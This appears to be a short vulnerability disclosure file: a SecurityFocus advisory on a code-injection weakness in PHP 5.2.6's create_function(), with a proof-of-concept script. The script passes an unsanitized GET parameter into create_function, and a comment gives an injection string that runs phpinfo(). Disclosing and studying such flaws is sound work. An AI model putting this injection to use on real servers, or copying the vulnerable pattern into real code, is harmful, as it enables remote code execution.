19 lines
836 B
PHP
Executable file
19 lines
836 B
PHP
Executable file
source: http://www.securityfocus.com/bid/31398/info
|
|
|
|
PHP is prone to a code-injection weakness because it fails to sufficiently sanitize input to 'create_function()'. Note that the anonymous function returned need not be called for the supplied code to be executed.
|
|
|
|
An attacker who can exploit this weakness will be able to execute code with the privileges of an additional vulnerable program.
|
|
|
|
This weakness is reported in PHP 5.2.6; other versions may also be affected.
|
|
|
|
<?php
|
|
# call as test.php?sort_by="]);}phpinfo();/*
|
|
$sort_by=stripslashes($_GET[sort_by]);
|
|
$databases=array("test");
|
|
$sorter = 'var_dump';
|
|
$sort_function = ' return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]); ';
|
|
|
|
|
|
usort($databases, create_function('$a, $b', $sort_function));
|
|
|
|
?>
|